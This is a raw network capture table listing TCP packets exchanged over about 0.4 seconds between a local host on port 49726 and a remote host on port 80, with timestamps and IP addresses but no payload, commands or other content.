                                                                                                                                                                                                Dec 13, 2024 08:18:53.027307987 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.027400970 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.028398991 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.028505087 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.028549910 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.029695034 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.029808998 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.029906034 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.030843019 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.030973911 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.031080961 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.032018900 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.032147884 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.032229900 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.033200979 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.033360958 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.033437967 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.034461021 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.034550905 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.034630060 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.035583973 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.035697937 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.035851002 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.036825895 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.036932945 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.037010908 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.038038015 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.038063049 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.038191080 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.039182901 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.039335966 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.039411068 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.040426970 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.040510893 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.040600061 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.041595936 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.041692972 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.041785955 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.042778015 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.042875051 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.042972088 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.044023991 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.044038057 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.044152021 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.045172930 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.045213938 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.045304060 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.046360016 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.046462059 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.046571016 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.047564030 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.047696114 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.047791004 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.048732042 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.048850060 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.048926115 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.049928904 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.050173044 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.050247908 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.051101923 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.051219940 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.051332951 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.052242041 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.105668068 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.181699991 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.181833982 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.181976080 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.182199955 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.182343006 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.183420897 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.183516979 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.183547974 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.183592081 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.184609890 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.184684992 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.184825897 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.185805082 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.185899973 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.186012030 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.186986923 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.187093973 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.188183069 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.188282967 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.188302040 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.188672066 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.189361095 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.189506054 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.189603090 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.190565109 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.190675974 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.190784931 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.191797018 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.191915035 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.192008972 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.192934036 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.193054914 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.194163084 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.194228888 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.194262981 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.194293976 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.195353031 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.195487976 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.195589066 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.196547031 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.196657896 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.197721958 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.197834015 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.197839022 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.197881937 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.198971033 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.199045897 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.199136972 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.200138092 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.200252056 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.200411081 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.201426983 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.201569080 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.201651096 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.202524900 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.202622890 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.203479052 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.203742981 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.203933001 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.204917908 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.205008030 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.205075979 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.206125975 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.206231117 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.206243992 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.207329988 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.207425117 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.207446098 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.207472086 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.208540916 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.208611012 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.208689928 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.209778070 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.209877968 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.209954977 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.210911989 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.211002111 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.212088108 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.212160110 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.212214947 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.212661028 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.213279009 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.213326931 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.213443041 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.214471102 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.214586973 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.214663982 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.215624094 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.215740919 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.216660976 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.216953039 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.217073917 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.217158079 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.218219995 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.218338966 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.218461037 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.219212055 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.219371080 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.219427109 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.220423937 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.220469952 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.220568895 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.221590042 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.221713066 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.221810102 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.222822905 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.222902060 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.223992109 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.224076033 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.224102020 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.224627972 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.225215912 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.225267887 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.225315094 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.226422071 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.226495028 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.226583958 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.227566004 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.227633953 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.227710009 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.228801012 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.228907108 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.229980946 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.230031967 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.230093956 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.231169939 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.231257915 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.231292009 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.231782913 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.232338905 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.232431889 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.232470036 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.233552933 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.233664036 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.233702898 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.234757900 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.234872103 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.234931946 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.235949039 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.236030102 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.237114906 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.237171888 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.237221956 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.238320112 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.238384962 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.238416910 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.239434004 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.239521980 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.239671946 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.239749908 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.240803957 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.240930080 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.241014004 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.241930962 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.242026091 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.242130041 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.243110895 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.243217945 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.243371964 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.244247913 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.293139935 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.373728991 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.373819113 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.373929977 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.374258995 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.374309063 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.374346018 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.376238108 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.376252890 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.376302958 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.377123117 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.377136946 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.377173901 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.377902031 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.378133059 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.378213882 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.379298925 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.379328012 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.379371881 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.380248070 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.380281925 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.380319118 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.381537914 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.381673098 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.381719112 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.382777929 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.382855892 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.382930994 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.383821011 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.383936882 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.383974075 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.385024071 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.385154963 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.385195971 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.386209965 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.386363983 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.386466026 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.387475967 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.387594938 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.387674093 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.388601065 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.388653994 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.388693094 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.389807940 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.389933109 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.389971972 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.390980959 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.391180992 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.391268969 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.392189026 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.392242908 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.392282963 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.393416882 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.393534899 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.393573999 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.394566059 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.394676924 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.394707918 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.395824909 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.395894051 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.395971060 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.396976948 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.397080898 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.397123098 CET4972680192.168.2.11185.81.68.147
